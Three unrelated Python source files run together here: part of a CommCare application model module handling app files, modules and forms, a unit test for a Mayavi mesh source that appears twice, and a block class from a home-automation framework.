self.put_attachment(value, 'custom_suite.xml')
def create_suite(self, build_profile_id=None):
self.assert_app_v2()
return SuiteGenerator(self, build_profile_id).generate_suite()
def create_media_suite(self, build_profile_id=None):
return MediaSuiteGenerator(self, build_profile_id).generate_suite()
@memoized
def get_practice_user_id(self, build_profile_id=None):
# returns app or build profile specific practice_mobile_worker_id
if build_profile_id:
build_spec = self.build_profiles[build_profile_id]
return build_spec.practice_mobile_worker_id
else:
return self.practice_mobile_worker_id
@property
@memoized
def enable_practice_users(self):
return (
self.supports_practice_users and
domain_has_privilege(self.domain, privileges.PRACTICE_MOBILE_WORKERS)
)
@property
@memoized
def enable_update_prompts(self):
return (
# custom for ICDS until ICDS users are > 2.38
(self.supports_update_prompts or toggles.ICDS.enabled(self.domain)) and
toggles.PHONE_HEARTBEAT.enabled(self.domain)
)
@memoized
def get_practice_user(self, build_profile_id=None):
"""
kwargs:
build_profile_id: id of a particular build profile to get the practice user for
If it's None, practice user of the default app is returned
Returns:
App or build profile specific practice user and validates that the user is
a practice mode user and that user belongs to app.domain
This is memoized to avoid refetching user when validating app, creating build files and
generating suite file.
"""
practice_user_id = self.get_practice_user_id(build_profile_id=build_profile_id)
if practice_user_id:
return get_and_assert_practice_user_in_domain(practice_user_id, self.domain)
else:
return None
@time_method()
def create_practice_user_restore(self, build_profile_id=None):
"""
Returns:
Returns restore xml as a string for the practice user of app or
app profile specfied by build_profile_id
Raises a PracticeUserException if the user is not practice user
"""
from corehq.apps.ota.models import DemoUserRestore
if not self.enable_practice_users:
return None
user = self.get_practice_user(build_profile_id)
if user:
user_restore = DemoUserRestore.objects.get(id=user.demo_restore_id)
return user_restore.get_restore_as_string()
else:
return None
@classmethod
def get_form_filename(cls, type=None, form=None, module=None):
return 'modules-%s/forms-%s.xml' % (module.id, form.id)
@time_method()
def _make_language_files(self, prefix, build_profile_id):
return {
"{}{}/app_strings.txt".format(prefix, lang): self.create_app_strings(lang, build_profile_id).encode('utf-8')
for lang in ['default'] + self.get_build_langs(build_profile_id)
}
@time_method()
def _get_form_files(self, prefix, build_profile_id):
files = {}
for form_stuff in self.get_forms(bare=False):
def exclude_form(form):
return isinstance(form, ShadowForm) or form.is_a_disabled_release_form()
if not exclude_form(form_stuff['form']):
filename = prefix + self.get_form_filename(**form_stuff)
form = form_stuff['form']
try:
files[filename] = self.fetch_xform(form=form, build_profile_id=build_profile_id)
except XFormValidationFailed:
raise XFormException(_('Unable to validate the forms due to a server error. '
'Please try again later.'))
except XFormException as e:
raise XFormException(_('Error in form "{}": {}').format(trans(form.name), six.text_type(e)))
return files
@time_method()
@memoized
def create_all_files(self, build_profile_id=None):
self.set_form_versions()
self.set_media_versions()
prefix = '' if not build_profile_id else build_profile_id + '/'
files = {
'{}profile.xml'.format(prefix): self.create_profile(is_odk=False, build_profile_id=build_profile_id),
'{}profile.ccpr'.format(prefix): self.create_profile(is_odk=True, build_profile_id=build_profile_id),
'{}media_profile.xml'.format(prefix):
self.create_profile(is_odk=False, with_media=True, build_profile_id=build_profile_id),
'{}media_profile.ccpr'.format(prefix):
self.create_profile(is_odk=True, with_media=True, build_profile_id=build_profile_id),
'{}suite.xml'.format(prefix): self.create_suite(build_profile_id),
'{}media_suite.xml'.format(prefix): self.create_media_suite(build_profile_id),
}
if self.target_commcare_flavor != 'none':
files['{}profile-{}.xml'.format(prefix, self.target_commcare_flavor)] = self.create_profile(
is_odk=False,
build_profile_id=build_profile_id,
target_commcare_flavor=self.target_commcare_flavor,
)
files['{}profile-{}.ccpr'.format(prefix, self.target_commcare_flavor)] = self.create_profile(
is_odk=True,
build_profile_id=build_profile_id,
target_commcare_flavor=self.target_commcare_flavor,
)
files['{}media_profile-{}.xml'.format(prefix, self.target_commcare_flavor)] = self.create_profile(
is_odk=False,
with_media=True,
build_profile_id=build_profile_id,
target_commcare_flavor=self.target_commcare_flavor,
)
files['{}media_profile-{}.ccpr'.format(prefix, self.target_commcare_flavor)] = self.create_profile(
is_odk=True,
with_media=True,
build_profile_id=build_profile_id,
target_commcare_flavor=self.target_commcare_flavor,
)
practice_user_restore = self.create_practice_user_restore(build_profile_id)
if practice_user_restore:
files.update({
'{}practice_user_restore.xml'.format(prefix): practice_user_restore
})
files.update(self._make_language_files(prefix, build_profile_id))
files.update(self._get_form_files(prefix, build_profile_id))
return files
get_modules = IndexedSchema.Getter('modules')
@parse_int([1])
def get_module(self, i):
try:
return self.modules[i].with_id(i % len(self.modules), self)
except IndexError:
raise ModuleNotFoundException(_("Could not find module with index {}".format(i)))
def get_module_by_unique_id(self, unique_id, error=''):
def matches(module):
return module.get_or_create_unique_id() == unique_id
for obj in self.get_modules():
if matches(obj):
return obj
if not error:
error = _("Could not find module with ID='{unique_id}' in app '{app_name}'.").format(
app_name=self.name, unique_id=unique_id)
raise ModuleNotFoundException(error)
def get_module_index(self, unique_id):
for index, module in enumerate(self.get_modules()):
if module.unique_id == unique_id:
return index
error = _("Could not find module with ID='{unique_id}' in app '{app_name}'.").format(
app_name=self.name, unique_id=unique_id)
raise ModuleNotFoundException(error)
def get_report_modules(self):
for module in self.modules:
if isinstance(module, ReportModule):
yield module
def get_forms(self, bare=True):
for module in self.get_modules():
for form in module.get_forms():
yield form if bare else {
'type': 'module_form',
'module': module,
'form': form
}
def get_form(self, form_unique_id, bare=True):
def matches(form):
return form.get_unique_id() == form_unique_id
for obj in self.get_forms(bare):
if matches(obj if bare else obj['form']):
return obj
raise FormNotFoundException(
("Form in app '%s' with unique id '%s' not found"
% (self.id, form_unique_id)))
def get_form_location(self, form_unique_id):
for m_index, module in enumerate(self.get_modules()):
for f_index, form in enumerate(module.get_forms()):
if form_unique_id == form.unique_id:
return m_index, f_index
raise KeyError("Form in app '%s' with unique id '%s' not found" % (self.id, form_unique_id))
@classmethod
def new_app(cls, domain, name, lang="en"):
app = cls(domain=domain, modules=[], name=name, langs=[lang], date_created=datetime.datetime.utcnow())
return app
def add_module(self, module):
self.modules.append(module)
return self.get_module(-1)
def delete_module(self, module_unique_id):
try:
module = self.get_module_by_unique_id(module_unique_id)
except ModuleNotFoundException:
return None
record = DeleteModuleRecord(
domain=self.domain,
app_id=self.id,
module_id=module.id,
module=module,
datetime=datetime.datetime.utcnow()
)
del self.modules[module.id]
record.save()
return record
def new_form(self, module_id, name, lang, attachment=Ellipsis):
module = self.get_module(module_id)
return module.new_form(name, lang, attachment)
def delete_form(self, module_unique_id, form_unique_id):
try:
module = self.get_module_by_unique_id(module_unique_id)
form = self.get_form(form_unique_id)
except (ModuleNotFoundException, FormNotFoundException):
return None
record = DeleteFormRecord(
domain=self.domain,
app_id=self.id,
module_unique_id=module_unique_id,
form_id=form.id,
form=form,
datetime=datetime.datetime.utcnow(),
)
record.save()
try:
form.pre_delete_hook()
except NotImplementedError:
pass
del module['forms'][form.id]
return record
def rename_lang(self, old_lang, new_lang):
validate_lang(new_lang)
if old_lang == new_lang:
return
if new_lang in self.langs:
raise AppEditingError("Language %s already exists!" % new_lang)
for i, lang in enumerate(self.langs):
if lang == old_lang:
self.langs[i] = new_lang
for profile in self.build_profiles:
for i, lang in enumerate(profile.langs):
if lang == old_lang:
profile.langs[i] = new_lang
for module in self.get_modules():
module.rename_lang(old_lang, new_lang)
_rename_key(self.translations, old_lang, new_lang)
def rearrange_modules(self, i, j):
modules = self.modules
try:
modules.insert(i, modules.pop(j))
except IndexError:
raise RearrangeError()
self.modules = modules
def rearrange_forms(self, to_module_id, from_module_id, i, j):
"""
The case type of the two modules conflict, the rearrangement goes through anyway.
This is intentional.
"""
to_module = self.get_module(to_module_id)
from_module = self.get_module(from_module_id)
try:
from_module.forms[j].pre_move_hook(from_module, to_module)
except NotImplementedError:
pass
try:
form = from_module.forms.pop(j)
if not isinstance(form, AdvancedForm):
if from_module.is_surveys != to_module.is_surveys:
if from_module.is_surveys:
form.requires = "case"
form.actions.update_case = UpdateCaseAction(
condition=FormActionCondition(type='always'))
else:
form.requires = "none"
form.actions.update_case = UpdateCaseAction(
condition=FormActionCondition(type='never'))
to_module.add_insert_form(from_module, form, index=i, with_source=True)
except IndexError:
raise RearrangeError()
def scrub_source(self, source):
source = update_form_unique_ids(source)
return update_report_module_ids(source)
def copy_form(self, from_module, form, to_module, rename=False):
"""
The case type of the two modules conflict,
copying (confusingly) is still allowed.
This is intentional.
"""
copy_source = deepcopy(form.to_json())
# only one form can be a release notes form, so set them to False explicitly when copying
copy_source['is_release_notes_form'] = False
copy_source['enable_release_notes'] = False
if 'unique_id' in copy_source:
del copy_source['unique_id']
if rename:
for lang, name in six.iteritems(copy_source['name']):
with override(lang):
copy_source['name'][lang] = _('Copy of {name}').format(name=name)
copy_form = to_module.add_insert_form(from_module, FormBase.wrap(copy_source))
to_app = to_module.get_app()
save_xform(to_app, copy_form, form.source.encode('utf-8'))
return copy_form
@cached_property
def has_case_management(self):
for module in self.get_modules():
for form in module.get_forms():
if len(form.active_actions()) > 0:
return True
return False
@memoized
def case_type_exists(self, case_type):
return case_type in self.get_case_types()
@memoized
def get_case_types(self):
extra_types = set()
if is_usercase_in_use(self.domain):
extra_types.add(USERCASE_TYPE)
return set(chain(*[m.get_case_types() for m in self.get_modules()])) | extra_types
def has_media(self):
return len(self.multimedia_map) > 0
@memoized
def get_xmlns_map(self):
xmlns_map = defaultdict(list)
for form in self.get_forms():
xmlns_map[form.xmlns].append(form)
return xmlns_map
def get_forms_by_xmlns(self, xmlns, log_missing=True):
"""
Return the forms with the given xmlns.
This function could return multiple forms if there are shadow forms in the app.
"""
if xmlns == "http://code.javarosa.org/devicereport":
return []
forms = self.get_xmlns_map()[xmlns]
if len(forms) < 1:
if log_missing:
logging.error('App %s in domain %s has %s forms with xmlns %s' % (
self.get_id,
self.domain,
len(forms),
xmlns,
))
return []
non_shadow_forms = [form for form in forms if form.form_type != 'shadow_form']
assert len(non_shadow_forms) <= 1
return forms
def get_xform_by_xmlns(self, xmlns, log_missing=True):
forms = self.get_forms_by_xmlns(xmlns, log_missing)
if not forms:
return None
else:
# If there are multiple forms with the same xmlns, then all but one are shadow forms, therefore they
# all have the same xform.
return forms[0].wrapped_xform()
def get_questions(self, xmlns, langs=None, include_triggers=False, include_groups=False,
include_translations=False):
forms = self.get_forms_by_xmlns(xmlns)
if not forms:
return []
# If there are multiple forms with the same xmlns, then some of them are shadow forms, so all the questions
# will be the same.
return forms[0].get_questions(langs or self.langs, include_triggers, include_groups, include_translations)
def validate_app(self):
return ApplicationValidator(self).validate_app()
def get_profile_setting(self, s_type, s_id):
setting = self.profile.get(s_type, {}).get(s_id)
if setting is not None:
return setting
yaml_setting = commcare_settings.get_commcare_settings_lookup()[s_type][s_id]
for contingent in yaml_setting.get("contingent_default", []):
if check_condition(self, contingent["condition"]):
setting = contingent["value"]
if setting is not None:
return setting
if not self.build_version or self.build_version < LooseVersion(yaml_setting.get("since", "0")):
setting = yaml_setting.get("disabled_default", None)
if setting is not None:
return setting
return yaml_setting.get("default")
@quickcache(['self._id', 'self.version'])
def get_case_metadata(self):
from corehq.apps.reports.formdetails.readable import AppCaseMetadata
case_relationships = get_parent_type_map(self)
meta = AppCaseMetadata()
descriptions_dict = get_case_property_description_dict(self.domain)
for case_type, relationships in case_relationships.items():
type_meta = meta.get_type(case_type)
type_meta.relationships = relationships
for module in self.get_modules():
module.update_app_case_meta(meta)
for form in module.get_forms():
form.update_app_case_meta(meta)
for type_ in meta.case_types:
for prop in type_.properties:
prop.description = descriptions_dict.get(type_.name, {}).get(prop.name, '')
return meta
def get_subcase_types(self, case_type):
"""
Return the subcase types defined across an app for the given case type
"""
return {t for m in self.get_modules()
if m.case_type == case_type
for t in m.get_subcase_types()}
@memoized
def grid_display_for_some_modules(self):
return self.grid_form_menus == 'some'
@memoized
def grid_display_for_all_modules(self):
return self.grid_form_menus == 'all'
class RemoteApp(ApplicationBase):
"""
A wrapper for a url pointing to a suite or profile file. This allows you to
write all the files for an app by hand, and then give the url to app_manager
and let it package everything together for you.
"""
profile_url = StringProperty(default="http://")
name = StringProperty()
manage_urls = BooleanProperty(default=False)
questions_map = DictProperty(required=False)
def is_remote_app(self):
return True
@classmethod
def new_app(cls, domain, name, lang='en'):
app = cls(domain=domain, name=name, langs=[lang])
return app
def create_profile(self, is_odk=False, langs=None):
# we don't do odk for now anyway
return remote_app.make_remote_profile(self, langs)
def strip_location(self, location):
return remote_app.strip_location(self.profile_url, location)
def fetch_file(self, location):
location = self.strip_location(location)
url = urljoin(self.profile_url, location)
try:
content = urlopen(url).read()
except Exception:
raise AppEditingError('Unable to access resource url: "%s"' % url)
return location, content
def get_build_langs(self):
if self.build_profiles:
if len(list(self.build_profiles.keys())) > 1:
raise AppEditingError('More than one app profile for a remote app')
else:
# return first profile, generated as part of lazy migration
return self.build_profiles[list(self.build_profiles.keys())[0]].langs
else:
return self.langs
@classmethod
def get_locations(cls, suite):
for resource in suite.findall('*/resource'):
try:
loc = resource.findtext('location[@authority="local"]')
except Exception:
loc = resource.findtext('location[@authority="remote"]')
yield resource.getparent().tag, loc
@property
def SUITE_XPATH(self):
return 'suite/resource/location[@authority="local"]'
def create_all_files(self, build_profile_id=None):
langs_for_build = self.get_build_langs()
files = {
'profile.xml': self.create_profile(langs=langs_for_build),
}
tree = _parse_xml(files['profile.xml'])
def add_file_from_path(path, strict=False, transform=None):
added_files = []
# must find at least one
try:
tree.find(path).text
except (TypeError, AttributeError):
if strict:
raise AppEditingError("problem with file path reference!")
else:
return
for loc_node in tree.findall(path):
loc, file = self.fetch_file(loc_node.text)
if transform:
file = transform(file)
files[loc] = file
added_files.append(file)
return added_files
add_file_from_path('features/users/logo')
try:
suites = add_file_from_path(
self.SUITE_XPATH,
strict=True,
transform=(lambda suite:
remote_app.make_remote_suite(self, suite))
)
except AppEditingError:
raise AppEditingError(ugettext('Problem loading suite file from profile file. Is your profile file correct?'))
for suite in suites:
suite_xml = _parse_xml(suite)
for tag, location in self.get_locations(suite_xml):
location, data = self.fetch_file(location)
if tag == 'xform' and langs_for_build:
try:
xform = XForm(data)
except XFormException as e:
raise XFormException('In file %s: %s' % (location, e))
xform.exclude_languages(whitelist=langs_for_build)
data = xform.render()
files.update({location: data})
return files
def make_questions_map(self):
langs_for_build = self.get_build_langs()
if self.copy_of:
xmlns_map = {}
def fetch(location):
filepath = self.strip_location(location)
return self.fetch_attachment('files/%s' % filepath, return_bytes=True)
profile_xml = _parse_xml(fetch('profile.xml'))
suite_location = profile_xml.find(self.SUITE_XPATH).text
suite_xml = _parse_xml(fetch(suite_location))
for tag, location in self.get_locations(suite_xml):
if tag == 'xform':
xform = XForm(fetch(location).decode('utf-8'))
xmlns = xform.data_node.tag_xmlns
questions = xform.get_questions(langs_for_build)
xmlns_map[xmlns] = questions
return xmlns_map
else:
return None
def get_questions(self, xmlns):
if not self.questions_map:
self.questions_map = self.make_questions_map()
if not self.questions_map:
return []
self.save()
questions = self.questions_map.get(xmlns, [])
return questions
class LinkedApplication(Application):
"""
An app that can pull changes from an app in a different domain.
"""
# This is the id of the master application
master = StringProperty()
# The following properties will overwrite their corresponding values from
# the master app everytime the new master is pulled
linked_app_translations = DictProperty() # corresponding property: translations
linked_app_logo_refs = DictProperty() # corresponding property: logo_refs
# if `uses_master_app_form_ids` is True, the form id might match the master's form id
# from a bug years ago. These should be fixed when mobile can handle the change
# https://manage.dimagi.com/default.asp?283410
uses_master_app_form_ids = BooleanProperty(default=False)
@property
@memoized
def domain_link(self):
from corehq.apps.linked_domain.dbaccessors import get_domain_master_link
return get_domain_master_link(self.domain)
def get_master_version(self):
if self.domain_link:
return get_master_app_version(self.domain_link, self.master)
@property
def master_is_remote(self):
if self.domain_link:
return self.domain_link.is_remote
def get_latest_master_release(self):
if self.domain_link:
return get_latest_master_app_release(self.domain_link, self.master)
else:
raise ActionNotPermitted
def reapply_overrides(self):
self.translations.update(self.linked_app_translations)
self.logo_refs.update(self.linked_app_logo_refs)
for key, ref in self.logo_refs.items():
mm = CommCareMultimedia.get(ref['m_id'])
self.create_mapping(mm, ref['path'], save=False)
self.save()
def import_app(app_id_or_source, domain, source_properties=None):
if isinstance(app_id_or_source, six.string_types):
soft_assert_type_text(app_id_or_source)
app_id = app_id_or_source
source = get_app(None, app_id)
source_domain = source['domain']
source = source.export_json(dump_json=False)
report_map = get_static_report_mapping(source_domain, domain)
else:
cls = get_correct_app_class(app_id_or_source)
# Don't modify original app source
app = cls.wrap(deepcopy(app_id_or_source))
source = app.export_json(dump_json=False)
report_map = {}
try:
attachments = source['_attachments']
except KeyError:
attachments = {}
finally:
source['_attachments'] = {}
if source_properties is not None:
for key, value in six.iteritems(source_properties):
source[key] = value
cls = get_correct_app_class(source)
# Allow the wrapper to update to the current default build_spec
if 'build_spec' in source:
del source['build_spec']
app = cls.from_source(source, domain)
app.date_created = datetime.datetime.utcnow()
app.cloudcare_enabled = domain_has_privilege(domain, privileges.CLOUDCARE)
if report_map:
for module in app.get_report_modules():
for config in module.report_configs:
try:
config.report_id = report_map[config.report_id]
except KeyError:
raise AppEditingError(
"Report {} not found in {}".format(config.report_id, domain)
)
app.save_attachments(attachments)
if not app.is_remote_app():
for _, m in app.get_media_objects():
if domain not in m.valid_domains:
m.valid_domains.append(domain)
m.save()
if not app.is_remote_app():
enable_usercase_if_necessary(app)
return app
def enable_usercase_if_necessary(app):
if any(module.uses_usercase() for module in app.get_modules()):
from corehq.apps.app_manager.util import enable_usercase
enable_usercase(app.domain)
class DeleteApplicationRecord(DeleteRecord):
app_id = StringProperty()
def undo(self):
app = ApplicationBase.get(self.app_id)
app.doc_type = app.get_doc_type()
app.save(increment_version=False)
class DeleteModuleRecord(DeleteRecord):
app_id = StringProperty()
module_id = IntegerProperty()
module = SchemaProperty(ModuleBase)
def undo(self):
app = Application.get(self.app_id)
modules = app.modules
modules.insert(self.module_id, self.module)
app.modules = modules
app.save()
class DeleteFormRecord(DeleteRecord):
app_id = StringProperty()
module_id = IntegerProperty()
module_unique_id = StringProperty()
form_id = IntegerProperty()
form = SchemaProperty(FormBase)
def undo(self):
app = Application.get(self.app_id)
if self.module_unique_id is not None:
name = trans(self.form.name, app.default_language, include_lang=False)
module = app.get_module_by_unique_id(
self.module_unique_id,
error=_("Could not find form '{}'").format(name)
)
else:
module = app.modules[self.module_id]
forms = module.forms
forms.insert(self.form_id, self.form)
module.forms = forms
app.save()
class GlobalAppConfig(Document):
# this should be the unique id of the app (not of a versioned copy)
app_id = StringProperty()
domain = StringProperty()
# these let mobile prompt updates for application and APK
app_prompt = StringProperty(
choices=["off", "on", "forced"],
default="off"
)
apk_prompt = StringProperty(
choices=["off", "on", "forced"],
default="off"
)
# corresponding versions to which user should be prompted to update to
apk_version = StringProperty(default=LATEST_APK_VALUE) # e.g. '2.38.0/latest'
app_version = IntegerProperty(default=LATEST_APP_VALUE)
@classmethod
def for_app(cls, app):
"""
Returns the actual config object for the app or an unsaved
default object
"""
app_id = app.master_id
res = cls.get_db().view(
"global_app_config_by_app_id/view",
key=[app_id, app.domain],
reduce=False,
include_docs=True,
).one()
if res:
return cls(res['doc'])
else:
# return default config
return cls(app_id=app_id, domain=app.domain)
def save(self, *args, **kwargs):
LatestAppInfo(self.app_id, self.domain).clear_caches()
super(GlobalAppConfig, self).save(*args, **kwargs)
class LatestEnabledBuildProfiles(models.Model):
app_id = models.CharField(max_length=255)
build_profile_id = models.CharField(max_length=255)
version = models.IntegerField()
build_id = models.CharField(max_length=255)
def expire_cache(self, domain):
get_latest_enabled_build_for_profile.clear(domain, self.build_profile_id)
get_latest_enabled_versions_per_profile.clear(self.app_id)
# backwards compatibility with suite-1.0.xml
FormBase.get_command_id = lambda self: id_strings.form_command(self)
FormBase.get_locale_id = lambda self: id_strings.form_locale(self)
ModuleBase.get_locale_id = lambda self: id_strings.module_locale(self)
ModuleBase.get_case_list_command_id = lambda self: id_strings.case_list_command(self)
ModuleBase.get_case_list_locale_id = lambda self: id_strings.case_list_locale(self)
Module.get_referral_list_command_id = lambda self: id_strings.referral_list_command(self)
Module.get_referral_list_locale_id = lambda self: id_strings.referral_list_locale(self)
|
import unittest
import numpy
from numpy.testing import assert_array_equal
from simphony.cuds.mesh import Mesh, Point, Cell, Edge, Face
from simphony_mayavi.sources.api import MeshSource, cell_array_slicer
from simphony_mayavi.sources.mesh_source import (
CELL2VTKCELL, FACE2VTKCELL, EDGE2VTKCELL)
class TestParticlesSource(unittest.TestCase):
def setUp(self):
self.points = points = numpy.array([
[0, 0, 0], [1, 0, 0], [0, 1, 0], [0, 0, 1],
[2, 0, 0], [3, 0, 0], [3, 1, 0], [2, 1, 0],
[2, 0, 1], [3, 0, 1], [3, 1, 1], [2, 1, 1]],
'f')
self.cells = [
[0, 1, 2, 3], # tetra
[4, 5, 6, 7, 8, 9, 10, 11]] # hex
self.faces = [[2, 7, 11]]
self.edges = [[1, 4], [3, 8]]
self.container = container = Mesh('test')
self.point_uids = [
container.add_point(Point(coordinates=point)) for point in points]
def test_points(self):
container = self.container
source = MeshSource.from_mesh(container)
points = source.data.points.to_array()
number_of_points = len(self.points)
self.assertEqual(len(points), number_of_points)
self.assertEqual(len(source.point2index), number_of_points)
for key, index in source.point2index.iteritems():
point = container.get_point(key)
assert_array_equal(points[index], point.coordinates)
def test_cells(self):
container = self.container
for cell in self.cells:
container.add_cell(
Cell(points=[self.point_uids[index] for index in cell]))
source = MeshSource.from_mesh(container)
vtk_source = source.data
cells = [
cell
for cell in cell_array_slicer(vtk_source.get_cells().to_array())]
number_of_cells = len(self.cells)
self.assertEqual(len(cells), number_of_cells)
self.assertEqual(len(source.element2index), number_of_cells)
for key, index in source.element2index.iteritems():
cell = container.get_cell(key)
self.assertEqual(
vtk_source.get_cell_type(index),
CELL2VTKCELL[len(cell.points)])
points = [source.point2index[uid] for uid in cell.points]
self.assertEqual(cells[index], points)
def test_edges(self):
container = self.container
for edge in self.edges:
container.add_edge(
Edge(points=[self.point_uids[index] for index in edge]))
source = MeshSource.from_mesh(container)
vtk_source = source.data
edges = [
edge
for edge in cell_array_slicer(vtk_source.get_cells().to_array())]
number_of_edges = len(self.edges)
self.assertEqual(len(edges), number_of_edges)
self.assertEqual(len(source.element2index), number_of_edges)
for key, index in source.element2index.iteritems():
edge = container.get_edge(key)
self.assertEqual(
vtk_source.get_cell_type(index),
EDGE2VTKCELL[len(edge.points)])
points = [source.point2index[uid] for uid in edge.points]
self.assertEqual(edges[index], points)
def test_face(self):
container = self.container
for face in self.faces:
container.add_face(
Face(points=[self.point_uids[index] for index in face]))
source = MeshSource.from_mesh(container)
vtk_source = source.data
faces = [
face
for face in cell_array_slicer(vtk_source.get_cells().to_array())]
number_of_faces = len(self.faces)
self.assertEqual(len(faces), number_of_faces)
self.assertEqual(len(source.element2index), number_of_faces)
for key, index in source.element2index.iteritems():
face = container.get_face(key)
self.assertEqual(
vtk_source.get_cell_type(index),
FACE2VTKCELL[len(face.points)])
points = [source.point2index[uid] for uid in face.points]
self.assertEqual(faces[index], points)
def test_all_element_types(self):
container = self.container
for face in self.faces:
container.add_face(
Face(points=[self.point_uids[index] for index in face]))
for edge in self.edges:
container.add_edge(
Edge(points=[self.point_uids[index] for index in edge]))
for cell in self.cells:
container.add_cell(
Cell(points=[self.point_uids[index] for index in cell]))
source = MeshSource.from_mesh(container)
vtk_source = source.data
elements = [
element
for element in cell_array_slicer(
vtk_source.get_cells().to_array())]
number_of_elements = \
len(self.faces) + len(self.edges) + len(self.cells)
self.assertEqual(len(elements), number_of_elements)
self.assertEqual(len(source.element2index), number_of_elements)
for key, index in source.element2index.iteritems():
cell_type = vtk_source.get_cell_type(index)
if cell_type in EDGE2VTKCELL.values():
element = container.get_edge(key)
self.assertEqual(
cell_type, EDGE2VTKCELL[len(element.points)])
elif cell_type in FACE2VTKCELL.values():
element = container.get_face(key)
self.assertEqual(
cell_type, FACE2VTKCELL[len(element.points)])
elif cell_type in CELL2VTKCELL.values():
element = container.get_cell(key)
self.assertEqual(
cell_type, CELL2VTKCELL[len(element.points)])
else:
self.fail('vtk source has an unknown cell type')
points = [source.point2index[uid] for uid in element.points]
self.assertEqual(elements[index], points)
Update test_mesh_source.py
import unittest
import numpy
from numpy.testing import assert_array_equal
from simphony.cuds.mesh import Mesh, Point, Cell, Edge, Face
from simphony_mayavi.sources.api import MeshSource, cell_array_slicer
from simphony_mayavi.sources.mesh_source import (
CELL2VTKCELL, FACE2VTKCELL, EDGE2VTKCELL)
class TestParticlesSource(unittest.TestCase):
def setUp(self):
self.points = points = numpy.array([
[0, 0, 0], [1, 0, 0], [0, 1, 0], [0, 0, 1],
[2, 0, 0], [3, 0, 0], [3, 1, 0], [2, 1, 0],
[2, 0, 1], [3, 0, 1], [3, 1, 1], [2, 1, 1]],
'f')
self.cells = [
[0, 1, 2, 3], # tetra
[4, 5, 6, 7, 8, 9, 10, 11]] # hex
self.faces = [[2, 7, 11]]
self.edges = [[1, 4], [3, 8]]
self.container = container = Mesh('test')
self.point_uids = [
container.add_point(Point(coordinates=point)) for point in points]
def test_points(self):
container = self.container
source = MeshSource.from_mesh(container)
points = source.data.points.to_array()
number_of_points = len(self.points)
self.assertEqual(len(points), number_of_points)
self.assertEqual(len(source.point2index), number_of_points)
for key, index in source.point2index.iteritems():
point = container.get_point(key)
assert_array_equal(points[index], point.coordinates)
def test_cells(self):
container = self.container
for cell in self.cells:
container.add_cell(
Cell(points=[self.point_uids[index] for index in cell]))
source = MeshSource.from_mesh(container)
vtk_source = source.data
cells = [
cell
for cell in cell_array_slicer(vtk_source.get_cells().to_array())]
number_of_cells = len(self.cells)
self.assertEqual(len(cells), number_of_cells)
self.assertEqual(len(source.element2index), number_of_cells)
for key, index in source.element2index.iteritems():
cell = container.get_cell(key)
self.assertEqual(
vtk_source.get_cell_type(index),
CELL2VTKCELL[len(cell.points)])
points = [source.point2index[uid] for uid in cell.points]
self.assertEqual(cells[index], points)
def test_edges(self):
container = self.container
for edge in self.edges:
container.add_edge(
Edge(points=[self.point_uids[index] for index in edge]))
source = MeshSource.from_mesh(container)
vtk_source = source.data
edges = [
edge
for edge in cell_array_slicer(vtk_source.get_cells().to_array())]
number_of_edges = len(self.edges)
self.assertEqual(len(edges), number_of_edges)
self.assertEqual(len(source.element2index), number_of_edges)
for key, index in source.element2index.iteritems():
edge = container.get_edge(key)
self.assertEqual(
vtk_source.get_cell_type(index),
EDGE2VTKCELL[len(edge.points)])
points = [source.point2index[uid] for uid in edge.points]
self.assertEqual(edges[index], points)
def test_face(self):
container = self.container
for face in self.faces:
container.add_face(
Face(points=[self.point_uids[index] for index in face]))
source = MeshSource.from_mesh(container)
vtk_source = source.data
faces = [
face
for face in cell_array_slicer(vtk_source.get_cells().to_array())]
number_of_faces = len(self.faces)
self.assertEqual(len(faces), number_of_faces)
self.assertEqual(len(source.element2index), number_of_faces)
for key, index in source.element2index.iteritems():
face = container.get_face(key)
self.assertEqual(
vtk_source.get_cell_type(index),
FACE2VTKCELL[len(face.points)])
points = [source.point2index[uid] for uid in face.points]
self.assertEqual(faces[index], points)
def test_all_element_types(self):
container = self.container
for face in self.faces:
container.add_face(
Face(points=[self.point_uids[index] for index in face]))
for edge in self.edges:
container.add_edge(
Edge(points=[self.point_uids[index] for index in edge]))
for cell in self.cells:
container.add_cell(
Cell(points=[self.point_uids[index] for index in cell]))
source = MeshSource.from_mesh(container)
vtk_source = source.data
elements = [
element
for element in cell_array_slicer(
vtk_source.get_cells().to_array())]
number_of_elements = \
len(self.faces) + len(self.edges) + len(self.cells)
self.assertEqual(len(elements), number_of_elements)
self.assertEqual(len(source.element2index), number_of_elements)
for key, index in source.element2index.iteritems():
cell_type = vtk_source.get_cell_type(index)
if cell_type in EDGE2VTKCELL.values():
element = container.get_edge(key)
self.assertEqual(
cell_type, EDGE2VTKCELL[len(element.points)])
elif cell_type in FACE2VTKCELL.values():
element = container.get_face(key)
self.assertEqual(
cell_type, FACE2VTKCELL[len(element.points)])
elif cell_type in CELL2VTKCELL.values():
element = container.get_cell(key)
self.assertEqual(
cell_type, CELL2VTKCELL[len(element.points)])
else:
self.fail('vtk source has an unknown cell type')
points = [source.point2index[uid] for uid in element.points]
self.assertEqual(elements[index], points)
|
import logging
from typing import Set
from idiotic import resource
from idiotic import config as global_config
import idiotic
import asyncio
if False:
from idiotic.cluster import Cluster
class Block:
REGISTRY = {}
running = False
name = None
inputs = {}
input_to = []
resources = []
config = {}
def __init__(self, name, inputs=None, resources=None, **config):
#: A globally unique identifier for the block
self.name = name
self.inputs = inputs or {}
#: List of resources that this block needs
self.resources = resources or []
#: The config for this block
self.config = config or {}
async def run(self, *args, **kwargs):
await asyncio.sleep(3600)
async def run_while_ok(self, cluster: 'Cluster'):
if self.running:
return
self.running = True
try:
if idiotic.node.own_block(self.name):
await self.init_resources()
while idiotic.node.own_block(self.name) and self.check_resources():
await self.run()
except KeyboardInterrupt:
raise
except:
logging.exception("While running block {}".format(self.name))
self.running = False
if idiotic.node.own_block(self.name):
idiotic.node.cluster.unassign_block(self.name)
idiotic.node.cluster.assign_block(self)
async def init_resources(self):
while not all((r.initialized for r in self.resources)):
await asyncio.sleep(.1)
def require(self, *resources: resource.Resource):
self.resources.extend(resources)
def precheck_nodes(self, config: global_config.Config) -> Set[str]:
all_nodes = set(config.nodes.keys())
for req in self.resources:
nodes = req.available_hosts(config)
if nodes is not None:
all_nodes.intersection_update(set(nodes))
return all_nodes
async def run_resources(self):
await asyncio.gather(*[asyncio.ensure_future(r.run()) for r in self.resources])
def check_resources(self) -> bool:
return all((r.available for r in self.resources))
def try_resources(self):
for r in self.resources:
r.try_check()
async def output(self, data, *args):
if not args:
args = [self.name,]
for source in args:
idiotic.node.dispatch({"data": data, "source": self.name+"."+source})
